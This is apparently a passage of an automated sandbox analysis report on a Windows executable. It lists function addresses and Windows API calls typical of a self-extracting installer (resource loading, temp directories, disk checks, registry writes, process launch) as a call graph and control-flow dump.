2720->2711 2721 3e3eff FreeLibrary 2720->2721 2722 3e3f40 FreeLibrary 2720->2722 2993 3e6495 2720->2993 2721->2704 2722->2705 2724 3e468f 7 API calls 2723->2724 2725 3e417d LocalAlloc 2724->2725 2726 3e41a8 2725->2726 2727 3e4195 2725->2727 2728 3e468f 7 API calls 2726->2728 2729 3e44b9 20 API calls 2727->2729 2730 3e41b5 2728->2730 2731 3e41a6 2729->2731 2732 3e41c5 lstrcmpA 2730->2732 2734 3e41b9 2730->2734 2731->2285 2733 3e41e6 LocalFree 2732->2733 2732->2734 2733->2731 2735 3e44b9 20 API calls 2734->2735 2735->2733 2737 3e303c 2736->2737 2737->2285 2739 3e171e _vsnprintf 2738->2739 2740 3e62c9 FindResourceA 2739->2740 2742 3e62cb LoadResource LockResource 2740->2742 2743 3e6353 2740->2743 2742->2743 2746 3e62e0 2742->2746 2744 3e6ce0 4 API calls 2743->2744 2745 3e51ca 2744->2745 2745->2602 2745->2603 2747 3e631b FreeResource 2746->2747 2748 3e6355 FreeResource 2746->2748 2749 3e171e _vsnprintf 2747->2749 2748->2743 2749->2740 2751 3e551a 2750->2751 2752 3e548a 2750->2752 2822 3e58c8 2751->2822 2811 3e53a1 2752->2811 2756 3e5495 2760 3e550c 2756->2760 2761 3e54c2 GetSystemInfo 2756->2761 2765 3e5581 2756->2765 2757 3e6ce0 4 API calls 2762 3e559a 2757->2762 2758 3e554d 2758->2765 2766 3e597d 34 API calls 2758->2766 2759 3e553b CreateDirectoryA 2763 3e5577 2759->2763 2764 3e5547 2759->2764 2767 3e658a CharPrevA 2760->2767 2769 3e54da 2761->2769 2762->2620 2774 3e2630 GetWindowsDirectoryA 2762->2774 2768 3e6285 GetLastError 2763->2768 2764->2758 2765->2757 2770 3e555c 2766->2770 2767->2751 2771 3e557c 2768->2771 2769->2760 2772 3e658a CharPrevA 2769->2772 2770->2765 2773 3e5568 RemoveDirectoryA 2770->2773 2771->2765 2772->2760 2773->2765 2775 3e265e 2774->2775 2776 3e266f 2774->2776 2777 3e44b9 20 API calls 2775->2777 2778 3e6ce0 4 API calls 2776->2778 2777->2776 2779 3e2687 2778->2779 2779->2634 2779->2644 2781 3e696e GetDiskFreeSpaceA 2780->2781 2782 3e69a1 2780->2782 2781->2782 2783 3e6989 MulDiv 2781->2783 2782->2653 2783->2782 2785 3e59dd GetDiskFreeSpaceA 2784->2785 2786 3e59bb 2784->2786 2787 3e5ba1 memset 2785->2787 2788 3e5a21 MulDiv 2785->2788 2789 3e44b9 20 API calls 2786->2789 2790 3e6285 GetLastError 2787->2790 2788->2787 2791 3e5a50 GetVolumeInformationA 2788->2791 2792 3e59cc 2789->2792 2793 3e5bbc GetLastError FormatMessageA 2790->2793 2794 3e5a6e memset 2791->2794 2795 3e5ab5 SetCurrentDirectoryA 2791->2795 2796 3e6285 GetLastError 2792->2796 2797 3e5be3 2793->2797 2798 3e6285 GetLastError 2794->2798 2799 3e5acc 2795->2799 2808 3e59d1 2796->2808 2800 3e44b9 20 API calls 2797->2800 2801 3e5a89 GetLastError FormatMessageA 2798->2801 2806 3e5b0a 2799->2806 2809 3e5b20 2799->2809 2802 3e5bf5 SetCurrentDirectoryA 2800->2802 2801->2797 2805 3e5b94 2802->2805 2803 3e6ce0 4 API calls 2804 3e5c11 2803->2804 2804->2634 2805->2803 2807 3e44b9 20 API calls 2806->2807 2807->2808 2808->2805 2809->2805 2834 3e268b 2809->2834 2813 3e53bf 2811->2813 2812 3e171e _vsnprintf 2812->2813 2813->2812 2814 3e658a CharPrevA 2813->2814 2817 3e5415 GetTempFileNameA 2813->2817 2815 3e53fa RemoveDirectoryA GetFileAttributesA 2814->2815 2815->2813 2816 3e544f CreateDirectoryA 2815->2816 2816->2817 2818 3e543a 2816->2818 2817->2818 2819 3e5429 DeleteFileA CreateDirectoryA 2817->2819 2820 3e6ce0 4 API calls 2818->2820 2819->2818 2821 3e5449 2820->2821 2821->2756 2823 3e58d8 2822->2823 2823->2823 2824 3e58df LocalAlloc 2823->2824 2825 3e58f3 2824->2825 2827 3e5919 2824->2827 2826 3e44b9 20 API calls 2825->2826 2833 3e5906 2826->2833 2829 3e658a CharPrevA 2827->2829 2828 3e6285 GetLastError 2830 3e5534 2828->2830 2831 3e5931 CreateFileA LocalFree 2829->2831 2830->2758 2830->2759 2832 3e595b CloseHandle GetFileAttributesA 2831->2832 2831->2833 2832->2833 2833->2828 2833->2830 2835 3e26b9 2834->2835 2836 3e26e5 2834->2836 2837 3e171e _vsnprintf 2835->2837 2838 3e271f 2836->2838 2839 3e26ea 2836->2839 2841 3e26cc 2837->2841 2843 3e171e _vsnprintf 2838->2843 2849 3e26e3 2838->2849 2840 3e171e _vsnprintf 2839->2840 2842 3e26fd 2840->2842 2845 3e44b9 20 API calls 2841->2845 2846 3e44b9 20 API calls 2842->2846 2847 3e2735 2843->2847 2844 3e6ce0 4 API calls 2848 3e276d 2844->2848 2845->2849 2846->2849 2850 3e44b9 20 API calls 2847->2850 2848->2805 2849->2844 2850->2849 2852 3e468f 7 API calls 2851->2852 2853 3e4ff5 FindResourceA LoadResource LockResource 2852->2853 2854 3e5020 2853->2854 2855 3e515f 2853->2855 2856 3e5029 GetDlgItem ShowWindow GetDlgItem ShowWindow 2854->2856 2857 3e5057 2854->2857 2855->2672 2856->2857 2873 3e4efd 2857->2873 2860 3e507c 2864 3e50e8 2860->2864 2870 3e5106 2860->2870 2861 3e5060 2862 3e44b9 20 API calls 2861->2862 2863 3e5075 2862->2863 2863->2870 2867 3e44b9 20 API calls 2864->2867 2865 3e511d 2868 3e513a 2865->2868 2869 3e5129 2865->2869 2866 3e5110 FreeResource 2866->2865 2867->2863 2868->2855 2872 3e514c SendMessageA 2868->2872 2871 3e44b9 20 API calls 2869->2871 2870->2865 2870->2866 2871->2868 2872->2855 2874 3e4f4a 2873->2874 2880 3e4fa1 2874->2880 2881 3e4980 2874->2881 2876 3e6ce0 4 API calls 2877 3e4fc6 2876->2877 2877->2860 2877->2861 2880->2876 2882 3e4990 2881->2882 2883 3e49a5 2882->2883 2884 3e49c2 lstrcmpA 2882->2884 2887 3e44b9 20 API calls 2883->2887 2885 3e4a0e 2884->2885 2886 3e49ba 2884->2886 2885->2886 2892 3e487a 2885->2892 2886->2880 2889 3e4b60 2886->2889 2887->2886 2890 3e4b92 CloseHandle 2889->2890 2891 3e4b76 2889->2891 2890->2891 2891->2880 2893 3e48a2 CreateFileA 2892->2893 2895 3e4908 2893->2895 2896 3e48e9 2893->2896 2895->2886 2896->2895 2897 3e48ee 2896->2897 2900 3e490c 2897->2900 2901 3e48f5 CreateFileA 2900->2901 2902 3e4917 2900->2902 2901->2895 2902->2901 2903 3e4962 CharNextA 2902->2903 2904 3e4953 CreateDirectoryA 2902->2904 2903->2902 2904->2903 2906 3e255b 2905->2906 2907 3e2510 2905->2907 2909 3e6ce0 4 API calls 2906->2909 2908 3e658a CharPrevA 2907->2908 2911 3e2522 WritePrivateProfileStringA _lopen 2908->2911 2910 3e2569 2909->2910 2910->2682 2911->2906 2912 3e2548 _llseek _lclose 2911->2912 2912->2906 2914 3e1b25 2913->2914 3017 3e1a84 2914->3017 2916 3e1b57 2917 3e658a CharPrevA 2916->2917 2918 3e1b8c 2916->2918 2917->2918 2919 3e66c8 2 API calls 2918->2919 2920 3e1bd1 2919->2920 2921 3e1bd9 CompareStringA 2920->2921 2922 3e1d73 2920->2922 2921->2922 2924 3e1bf7 GetFileAttributesA 2921->2924 2923 3e66c8 2 API calls 2922->2923 2927 3e1d7d 2923->2927 2925 3e1c0d 2924->2925 2926 3e1d53 2924->2926 2925->2926 2930 3e1a84 2 API calls 2925->2930 2932 3e44b9 20 API calls 2926->2932 2928 3e1df8 LocalAlloc 2927->2928 2929 3e1d81 CompareStringA 2927->2929 2928->2926 2931 3e1e0b GetFileAttributesA 2928->2931 2929->2928 2936 3e1d9b 2929->2936 2933 3e1c31 2930->2933 2939 3e1e1d 2931->2939 2951 3e1e45 2931->2951 2950 3e1cc2 2932->2950 2934 3e1c50 LocalAlloc 2933->2934 2940 3e1a84 2 API calls 2933->2940 2934->2926 2937 3e1c67 GetPrivateProfileIntA GetPrivateProfileStringA 2934->2937 2935 3e1e89 2938 3e6ce0 4 API calls 2935->2938 2936->2936 2941 3e1dbe LocalAlloc 2936->2941 2946 3e1cf8 2937->2946 2937->2950 2944 3e1ea1 2938->2944 2939->2951 2940->2934 2941->2926 2945 3e1de1 2941->2945 2944->2695 2949 3e171e _vsnprintf 2945->2949 2947 3e1d09 GetShortPathNameA 2946->2947 2948 3e1d23 2946->2948 2947->2948 2952 3e171e _vsnprintf 2948->2952 2949->2950 2950->2935 3023 3e2aac 2951->3023 2952->2950 2954 3e209a 2953->2954 2955 3e2256 2953->2955 2957 3e171e _vsnprintf 2954->2957 2960 3e20dc 2954->2960 2956 3e6ce0 4 API calls 2955->2956 2958 3e2263 2956->2958 2959 3e20af RegQueryValueExA 2957->2959 2958->2695 2959->2954 2959->2960 2961 3e20fb GetSystemDirectoryA 2960->2961 2962 3e20e4 RegCloseKey 2960->2962 2963 3e658a CharPrevA 2961->2963 2962->2955 2964 3e211b LoadLibraryA 2963->2964 2965 3e212e GetProcAddress FreeLibrary 2964->2965 2966 3e2179 GetModuleFileNameA 2964->2966 2965->2966 2967 3e214e GetSystemDirectoryA 2965->2967 2968 3e21de RegCloseKey 2966->2968 2971 3e2177 2966->2971 2969 3e2165 2967->2969 2967->2971 2968->2955 2970 3e658a CharPrevA 2969->2970 2970->2971 2971->2971 2972 3e21b7 LocalAlloc 2971->2972 2973 3e21ec 2972->2973 2974 3e21cd 2972->2974 2976 3e171e _vsnprintf 2973->2976 2975 3e44b9 20 API calls 2974->2975 2975->2968 2977 3e2218 RegSetValueExA RegCloseKey LocalFree 2976->2977 2977->2955 2980 3e4016 CreateProcessA 2979->2980 2991 3e4106 2979->2991 2982 3e40c4 2980->2982 2983 3e4041 WaitForSingleObject GetExitCodeProcess 2980->2983 2981 3e6ce0 4 API calls 2985 3e4117 2981->2985 2986 3e6285 GetLastError 2982->2986 2984 3e4070 2983->2984 3050 3e411b 2984->3050 2985->2695 2988 3e40c9 GetLastError FormatMessageA 2986->2988 2990 3e44b9 20 API calls 2988->2990 2989 3e4096 CloseHandle CloseHandle 2989->2991 2992 3e40ba 2989->2992 2990->2991 2991->2981 2992->2991 2994 3e64c2 2993->2994 2995 3e658a CharPrevA 2994->2995 2996 3e64d8 GetFileAttributesA 2995->2996 2997 3e64ea 2996->2997 2998 3e6501 LoadLibraryA 2996->2998 2997->2998 2999 3e64ee LoadLibraryExA 2997->2999 3000 3e6508 2998->3000 2999->3000 3001 3e6ce0 4 API calls 3000->3001 3002 3e6513 3001->3002 3002->2720 3004 3e2289 RegOpenKeyExA 3003->3004 3005 3e2381 3003->3005 3004->3005 3007 3e22b1 RegQueryValueExA 3004->3007 3006 3e6ce0 4 API calls 3005->3006 3008 3e238c 3006->3008 3009 3e22e6 memset GetSystemDirectoryA 3007->3009 3010 3e2374 RegCloseKey 3007->3010 3008->2693 3011 3e230f 3009->3011 3012 3e2321 3009->3012 3010->3005 3013 3e658a CharPrevA 3011->3013 3014 3e171e _vsnprintf 3012->3014 3013->3012 3015 3e233f RegSetValueExA 3014->3015 3015->3010 3018 3e1a9a 3017->3018 3020 3e1aba 3018->3020 3022 3e1aaf 3018->3022 3036 3e667f 3018->3036 3020->2916 3021 3e667f 2 API calls 3021->3022 3022->3020 3022->3021 3024 3e2be6 3023->3024 3025 3e2ad4 GetModuleFileNameA 3023->3025 3026 3e6ce0 4 API calls 3024->3026 3033 3e2b02 3025->3033 3028 3e2bf5 3026->3028 3027 3e2af1 IsDBCSLeadByte 3027->3033 3028->2935 3029 3e2bca CharNextA 3032 3e2bd3 CharNextA 3029->3032 3030 3e2b11 CharNextA CharUpperA 3031 3e2b8d CharUpperA 3030->3031 3030->3033 3031->3033 3032->3033 3033->3024 3033->3027 3033->3029 3033->3030 3033->3032 3035 3e2b43 CharPrevA 3033->3035 3041 3e65e8 3033->3041 3035->3033 3038 3e6689 3036->3038 3037 3e6648 IsDBCSLeadByte 3037->3038 3038->3037 3039 3e66a5 3038->3039 3040 3e6697 CharNextA 3038->3040 3039->3018 3040->3038 3042 3e65f4 3041->3042 3042->3042 3043 3e65fb CharPrevA 3042->3043 3044 3e6611 CharPrevA 3043->3044 3045 3e661e 3044->3045 3046 3e660b 3044->3046 3047 3e663d 3045->3047 3048 3e6627 CharPrevA 3045->3048 3049 3e6634 CharNextA 3045->3049 3046->3044 3046->3045 3047->3033 3048->3047 3048->3049 3049->3047 3051 3e4132 3050->3051 3053 3e412a 3050->3053 3054 3e1ea7 3051->3054 3053->2989 3055 3e1eba 3054->3055 3056 3e1ed3 3054->3056 3057 3e256d 15 API calls 3055->3057 3056->3053 3057->3056 3059 3e2026 3058->3059 3060 3e1ff0 RegOpenKeyExA 3058->3060 3059->2318 3060->3059 3061 3e200f RegDeleteValueA RegCloseKey 3060->3061 3061->3059 3171 3e6a20 __getmainargs 3172 3e19e0 3173 3e1a24 GetDesktopWindow 3172->3173 3174 3e1a03 3172->3174 3175 3e43d0 11 API calls 3173->3175 3176 3e1a16 EndDialog 3174->3176 3177 3e1a20 3174->3177 3178 3e1a33 LoadStringA SetDlgItemTextA MessageBeep 3175->3178 3176->3177 3179 3e6ce0 4 API calls 3177->3179 3178->3177 3180 3e1a7e 3179->3180 3062 3e4ad0 3070 3e3680 3062->3070 3065 3e4aee WriteFile 3067 3e4b0f 3065->3067 3068 3e4b14 3065->3068 3066 3e4ae9 3068->3067 3069 3e4b3b SendDlgItemMessageA 3068->3069 3069->3067 3071 3e3691 MsgWaitForMultipleObjects 3070->3071 3072 3e36e8 3071->3072 3073 3e36a9 PeekMessageA 3071->3073 3072->3065 3072->3066 3073->3071 3074 3e36bc 3073->3074 3074->3071 3074->3072 3075 3e36c7 DispatchMessageA 3074->3075 3076 3e36d1 PeekMessageA 3074->3076 3075->3076 3076->3074 3077 3e4cd0 3078 3e4d0b 3077->3078 3079 3e4cf4 3077->3079 3080 3e4d02 3078->3080 3083 3e4dcb 3078->3083 3086 3e4d25 3078->3086 3079->3080 3081 3e4b60 CloseHandle 3079->3081 3082 3e6ce0 4 API calls 3080->3082 3081->3080 3084 3e4e95 3082->3084 3085 3e4dd4 SetDlgItemTextA 3083->3085 3087 3e4de3 3083->3087 3085->3087 3086->3080 3100 3e4c37 3086->3100 3087->3080 3105 3e476d 3087->3105 3091 3e4e38 3091->3080 3093 3e4980 25 API calls 3091->3093 3092 3e4b60 CloseHandle 3094 3e4d99 SetFileAttributesA 3092->3094 3095 3e4e56 3093->3095 3094->3080 3095->3080 3096 3e4e64 3095->3096 3114 3e47e0 LocalAlloc 3096->3114 3099 3e4e6f 3099->3080 3101 3e4c4c DosDateTimeToFileTime 3100->3101 3102 3e4c88 3100->3102 3101->3102 3103 3e4c5e LocalFileTimeToFileTime 3101->3103 3102->3080 3102->3092 3103->3102 3104 3e4c70 SetFileTime 3103->3104 3104->3102 3123 3e66ae GetFileAttributesA 3105->3123 3107 3e477b 3107->3091 3108 3e47cc SetFileAttributesA 3110 3e47db 3108->3110 3110->3091 3111 3e6517 24 API calls 3112 3e47b1 3111->3112 3112->3108 3112->3110 3113 3e47c2 3112->3113 3113->3108 3115 3e480f LocalAlloc 3114->3115 3116 3e47f6 3114->3116 3119 3e4831 3115->3119 3122 3e480b 3115->3122 3117 3e44b9 20 API calls 3116->3117 3117->3122 3120 3e44b9 20 API calls 3119->3120 3121 3e4846 LocalFree 3120->3121 3121->3122 3122->3099 3124 3e4777 3123->3124 3124->3107 3124->3108 3124->3111 3181 3e3210 3182 3e3227 3181->3182 3205 3e328e EndDialog 3181->3205 3183 3e3235 3182->3183 3184 3e33e2 GetDesktopWindow 3182->3184 3188 3e324c 3183->3188 3189 3e32dd GetDlgItemTextA 3183->3189 3196 3e3239 3183->3196 3186 3e43d0 11 API calls 3184->3186 3187 3e33f1 SetWindowTextA SendDlgItemMessageA 3186->3187 3190 3e341f GetDlgItem EnableWindow 3187->3190 3187->3196 3191 3e32c5 EndDialog 3188->3191 3192 3e3251 3188->3192 3197 3e32fc 3189->3197 3213 3e3366 3189->3213 3190->3196 3191->3196 3193 3e325c LoadStringA 3192->3193 3192->3196 3195 3e3294 3193->3195 3206 3e327b 3193->3206 3194 3e44b9 20 API calls 3194->3196 3219 3e4224 LoadLibraryA 3195->3219 3200 3e3331 GetFileAttributesA 3197->3200 3197->3213 3203 3e333f 3200->3203 3204 3e337c 3200->3204 3201 3e44b9 20 API calls 3201->3205 3202 3e32a5 SetDlgItemTextA 3202->3196 3202->3206 3208 3e44b9 20 API calls 3203->3208 3207 3e658a CharPrevA 3204->3207 3205->3196 3206->3201 3209 3e338d 3207->3209 3210 3e3351 3208->3210 3211 3e58c8 27 API calls 3209->3211 3210->3196 3212 3e335a CreateDirectoryA 3210->3212 3214 3e3394 3211->3214 3212->3204 3212->3213 3213->3194 3214->3213 3215 3e33a4 3214->3215 3216 3e33c7 EndDialog 3215->3216 3217 3e597d 34 API calls 3215->3217 3216->3196 3218 3e33c3 3217->3218 3218->3196 3218->3216 3220 3e4246 GetProcAddress 3219->3220 3221 3e43b2 3219->3221 3222 3e425d GetProcAddress 3220->3222 3223 3e43a4 FreeLibrary 3220->3223 3225 3e44b9 20 API calls 3221->3225 3222->3223 3224 3e4274 GetProcAddress 3222->3224 3223->3221 3224->3223 3226 3e428b 3224->3226 3227 3e329d 3225->3227 3228 3e4295 GetTempPathA 3226->3228 3232 3e42e1 3226->3232 3227->3196 3227->3202 3229 3e42ad 3228->3229 3229->3229 3230 3e42b4 CharPrevA 3229->3230 3231 3e42d0 CharPrevA 3230->3231 3230->3232 3231->3232 3233 3e4390 FreeLibrary 3232->3233 3233->3227 3234 3e4a50 3235 3e4a9f ReadFile 3234->3235 3236 3e4a66 3234->3236 3237 3e4abb 3235->3237 3236->3237 3238 3e4a82 memcpy 3236->3238 3238->3237 3239 3e3450 3240 3e345e 3239->3240 3241 3e34d3 EndDialog 3239->3241 3242 3e349a GetDesktopWindow 3240->3242 3245 3e3465 3240->3245 3244 3e346a 3241->3244 3243 3e43d0 11 API calls 3242->3243 3246 3e34ac SetWindowTextA SetDlgItemTextA SetForegroundWindow 3243->3246 3245->3244 3247 3e348c EndDialog 3245->3247 3246->3244 3247->3244 3248 3e6c03 3249 3e6c1e 3248->3249 3250 3e6c17 _exit 3248->3250 3251 3e6c27 _cexit 3249->3251 3252 3e6c32 3249->3252 3250->3249 3251->3252 3125 3e4cc0 GlobalFree 3253 3e4200 3254 3e421e 3253->3254 3255 3e420b SendMessageA 3253->3255 3255->3254 3256 3e3100 3257 3e31b0 3256->3257 3258 3e3111 3256->3258 3260 3e31b9 SendDlgItemMessageA 3257->3260 3261 3e3141 3257->3261 3259 3e311d 3258->3259 3262 3e3149 GetDesktopWindow 3258->3262 3259->3261 3263 3e3138 EndDialog 3259->3263 3260->3261 3264 3e43d0 11 API calls 3262->3264 3263->3261 3265 3e315d 6 API calls 3264->3265 3265->3261 3266 3e6f40 SetUnhandledExceptionFilter 3267 3e4bc0 3268 3e4bd7 3267->3268 3270 3e4c05 3267->3270 3269 3e4c1b SetFilePointer 3269->3268 3270->3268 3270->3269 3271 3e30c0 3272 3e30de CallWindowProcA 3271->3272 3273 3e30ce 3271->3273 3274 3e30da 3272->3274 3273->3272 3273->3274 3275 3e63c0 3276 3e6407 3275->3276 3277 3e658a CharPrevA 3276->3277 3278 3e6415 CreateFileA 3277->3278 3279 3e643a 3278->3279 3280 3e6448 WriteFile 3278->3280 3283 3e6ce0 4 API calls 3279->3283 3281 3e6465 CloseHandle 3280->3281 3281->3279 3284 3e648f 3283->3284

                                                                                                                                                                                                                                                            Callgraph

                                                                                                                                                                                                                                                            • Executed
                                                                                                                                                                                                                                                            • Not Executed
                                                                                                                                                                                                                                                            • Opacity -> Relevance
                                                                                                                                                                                                                                                            • Disassembly available
                                                                                                                                                                                                                                                            callgraph 0 Function_003E3A3F 16 Function_003E6517 0->16 51 Function_003E44B9 0->51 74 Function_003E468F 0->74 79 Function_003E6285 0->79 1 Function_003E6C3F 2 Function_003E4C37 3 Function_003E2630 3->51 104 Function_003E6CE0 3->104 4 Function_003E202A 10 Function_003E171E 4->10 4->51 75 Function_003E658A 4->75 4->104 5 Function_003E6E2A 89 Function_003E6CF0 5->89 6 Function_003E3B26 6->16 68 Function_003E6298 6->68 102 Function_003E4FE0 6->102 7 Function_003E4224 7->51 81 Function_003E1680 7->81 8 Function_003E7120 9 Function_003E6A20 11 Function_003E621E 27 Function_003E597D 11->27 11->51 11->79 11->104 12 Function_003E681F 88 Function_003E66F9 12->88 12->104 13 Function_003E2F1D 13->0 13->6 13->11 32 Function_003E256D 13->32 34 Function_003E4169 13->34 37 Function_003E5164 13->37 13->51 60 Function_003E3BA2 13->60 63 Function_003E55A0 13->63 13->75 13->79 101 Function_003E51E5 13->101 13->104 14 Function_003E411B 58 Function_003E1EA7 14->58 15 Function_003E5C17 16->51 17 Function_003E3210 17->7 17->27 17->51 17->75 111 Function_003E43D0 17->111 112 Function_003E58C8 17->112 18 Function_003E7010 19 Function_003E490C 20 Function_003E7208 21 Function_003E4702 53 Function_003E16B3 21->53 21->81 22 Function_003E6C03 47 Function_003E724D 22->47 23 Function_003E7000 24 Function_003E4200 25 Function_003E3100 25->111 26 Function_003E667F 48 Function_003E6648 26->48 27->51 76 Function_003E268B 27->76 27->79 27->104 28 Function_003E487A 28->19 29 Function_003E2773 29->75 29->81 84 Function_003E1781 29->84 29->104 30 Function_003E7270 31 Function_003E6C70 105 Function_003E24E0 32->105 33 Function_003E476D 33->16 55 Function_003E66AE 33->55 34->51 34->74 35 Function_003E5467 35->27 65 Function_003E53A1 35->65 35->75 35->79 35->81 35->84 35->104 35->112 36 Function_003E2267 36->10 36->75 36->104 37->51 37->68 37->74 38 Function_003E4B60 39 Function_003E6A60 39->1 39->20 40 Function_003E7060 39->40 43 Function_003E7155 39->43 39->47 87 Function_003E2BFB 39->87 40->8 40->18 41 Function_003E6760 42 Function_003E6F54 42->20 42->47 44 Function_003E6952 45 Function_003E4A50 46 Function_003E3450 46->111 49 Function_003E6F40 50 Function_003E6FBE 50->42 51->10 51->12 51->81 51->104 115 Function_003E67C9 51->115 52 Function_003E52B6 72 Function_003E2390 52->72 52->84 100 Function_003E65E8 52->100 52->104 108 Function_003E1FE1 52->108 53->84 54 Function_003E69B0 54->23 54->31 54->50 95 Function_003E71EF 54->95 56 Function_003E2AAC 56->81 56->100 56->104 114 Function_003E17C8 56->114 57 Function_003E2CAA 57->16 57->51 62 Function_003E18A3 57->62 67 Function_003E5C9E 57->67 57->72 57->74 92 Function_003E36EE 57->92 57->104 58->32 59 Function_003E6FA5 59->47 60->4 60->36 60->51 70 Function_003E6495 60->70 60->74 60->79 60->84 94 Function_003E3FEF 60->94 98 Function_003E1AE8 60->98 60->104 61 Function_003E72A2 93 Function_003E17EE 62->93 62->104 63->3 63->16 63->27 63->35 63->44 63->51 63->74 63->75 63->79 63->84 63->104 64 Function_003E4CA0 65->10 65->75 65->81 65->104 66 Function_003E6FA1 67->5 67->15 67->26 67->51 67->75 67->81 103 Function_003E31E0 67->103 67->104 113 Function_003E66C8 67->113 68->10 68->104 69 Function_003E4E99 69->81 70->75 70->84 70->104 71 Function_003E6793 72->53 72->72 72->75 72->81 72->104 73 Function_003E1F90 73->51 73->58 73->104 75->53 76->10 76->51 76->104 77 Function_003E2A89 78 Function_003E1A84 78->26 80 Function_003E4980 80->28 80->51 81->84 82 Function_003E3680 83 Function_003E6380 85 Function_003E70FE 86 Function_003E4EFD 86->38 86->80 86->104 87->13 87->52 87->57 87->73 90 Function_003E34F0 90->51 90->82 90->111 91 Function_003E6EF0 92->12 92->51 92->77 99 Function_003E28E8 92->99 92->104 92->115 93->104 94->14 94->51 94->79 94->104 96 Function_003E6BEF 97 Function_003E70EB 98->10 98->51 98->53 98->56 98->75 98->78 98->81 98->84 98->104 98->113 99->29 99->77 101->51 101->74 101->79 102->51 102->74 102->86 104->89 105->75 105->104 106 Function_003E19E0 106->104 106->111 107 Function_003E47E0 107->51 107->81 109 Function_003E4AD0 109->82 110 Function_003E4CD0 110->2 110->21 110->33 110->38 110->69 110->80 110->104 110->107 111->104 112->51 112->75 112->79 112->81 113->48 115->71 116 Function_003E4CC0 117 Function_003E4BC0 118 Function_003E30C0 119 Function_003E63C0 119->75 119->84 119->104

                                                                                                                                                                                                                                                            Executed Functions

                                                                                                                                                                                                                                                            Function 003E3BA2 Relevance: 40.6, APIs: 11, Strings: 12, Instructions: 308libraryloaderCOMMON
                                                                                                                                                                                                                                                            Download Yara Rule

                                                                                                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                                                                                                            • Executed
                                                                                                                                                                                                                                                            • Not Executed
                                                                                                                                                                                                                                                            control_flow_graph 36 3e3ba2-3e3bd9 37 3e3bfd-3e3bff 36->37 38 3e3bdb-3e3be7 call 3e468f 36->38 40 3e3c03-3e3c28 memset 37->40 41 3e3bec-3e3bee 38->41 42 3e3c2e-3e3c40 call 3e468f 40->42 43 3e3d35-3e3d48 call 3e1781 40->43 44 3e3bf4-3e3bf7 41->44 45 3e3d13-3e3d30 call 3e44b9 41->45 42->45 51 3e3c46-3e3c49 42->51 49 3e3d4d-3e3d52 43->49 44->37 44->45 57 3e3f4d 45->57 53 3e3d9e-3e3db6 call 3e1ae8 49->53 54 3e3d54-3e3d6c call 3e468f 49->54 51->45 55 3e3c4f-3e3c56 51->55 53->57 68 3e3dbc-3e3dc2 53->68 54->45 64 3e3d6e-3e3d75 54->64 59 3e3c58-3e3c5e 55->59 60 3e3c60-3e3c65 55->60 62 3e3f4f-3e3f63 call 3e6ce0 57->62 65 3e3c6e-3e3c73 59->65 66 3e3c67-3e3c6d 60->66 67 3e3c75-3e3c7c 60->67 70 3e3fda-3e3fe1 64->70 71 3e3d7b-3e3d98 CompareStringA 64->71 72 3e3c87-3e3c89 65->72 66->65 67->72 75 3e3c7e-3e3c82 67->75 73 3e3de6-3e3de8 68->73 74 3e3dc4-3e3dce 68->74 81 3e3fe8-3e3fea 70->81 82 3e3fe3 call 3e2267 70->82 71->53 71->70 72->49 78 3e3c8f-3e3c98 72->78 79 3e3dee-3e3df5 73->79 80 3e3f0b-3e3f15 call 3e3fef 73->80 74->73 77 3e3dd0-3e3dd7 74->77 75->72 77->73 84 3e3dd9-3e3ddb 77->84 85 3e3c9a-3e3c9c 78->85 86 3e3cf1-3e3cf3 78->86 87 3e3fab-3e3fd2 call 3e44b9 LocalFree 79->87 88 3e3dfb-3e3dfd 79->88 91 3e3f1a-3e3f1c 80->91 81->62 82->81 84->79 92 3e3ddd-3e3de1 call 3e202a 84->92 94 3e3c9e-3e3ca3 85->94 95 3e3ca5-3e3ca7 85->95 86->53 90 3e3cf9-3e3d11 call 3e468f 86->90 87->57 88->80 96 3e3e03-3e3e0a 88->96 90->45 90->49 98 3e3f1e-3e3f2d LocalFree 91->98 99 3e3f46-3e3f47 LocalFree 91->99 92->73 102 3e3cb2-3e3cc5 call 3e468f 94->102 95->57 103 3e3cad 95->103 96->80 104 3e3e10-3e3e19 call 3e6495 96->104 107 3e3fd7-3e3fd9 98->107 108 3e3f33-3e3f3b 98->108 99->57 102->45 112 3e3cc7-3e3ce8 CompareStringA 102->112 103->102 113 3e3e1f-3e3e36 GetProcAddress 104->113 114 3e3f92-3e3fa9 call 3e44b9 104->114 107->70 108->40 112->86 115 3e3cea-3e3ced 112->115 116 3e3e3c-3e3e80 113->116 117 3e3f64-3e3f76 call 3e44b9 FreeLibrary 113->117 126 3e3f7c-3e3f90 LocalFree call 3e6285 114->126 115->86 120 3e3e8b-3e3e94 116->120 121 3e3e82-3e3e87 116->121 117->126 124 3e3e9f-3e3ea2 120->124 125 3e3e96-3e3e9b 120->125 121->120 128 3e3ead-3e3eb6 124->128 129 3e3ea4-3e3ea9 124->129 125->124 126->57 131 3e3eb8-3e3ebd 128->131 132 3e3ec1-3e3ec3 128->132 129->128 131->132 133 3e3ece-3e3eec 132->133 134 3e3ec5-3e3eca 132->134 137 3e3eee-3e3ef3 133->137 138 3e3ef5-3e3efd 133->138 134->133 137->138 139 3e3eff-3e3f09 FreeLibrary 138->139 140 3e3f40 FreeLibrary 138->140 139->98 140->99
                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                            • memset.MSVCRT ref: 003E3C11
                                                                                                                                                                                                                                                            • CompareStringA.KERNEL32(0000007F,00000001,?,000000FF,<None>,000000FF,00000104,00000004), ref: 003E3CDC
                                                                                                                                                                                                                                                              • Part of subcall function 003E468F: FindResourceA.KERNEL32(00000000,TITLE,0000000A), ref: 003E46A0
                                                                                                                                                                                                                                                              • Part of subcall function 003E468F: SizeofResource.KERNEL32(00000000,00000000,?,003E2D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 003E46A9
                                                                                                                                                                                                                                                              • Part of subcall function 003E468F: FindResourceA.KERNEL32(00000000,TITLE,0000000A), ref: 003E46C3
                                                                                                                                                                                                                                                              • Part of subcall function 003E468F: LoadResource.KERNEL32(00000000,00000000,?,003E2D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 003E46CC
                                                                                                                                                                                                                                                              • Part of subcall function 003E468F: LockResource.KERNEL32(00000000,?,003E2D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 003E46D3
                                                                                                                                                                                                                                                              • Part of subcall function 003E468F: memcpy_s.MSVCRT ref: 003E46E5
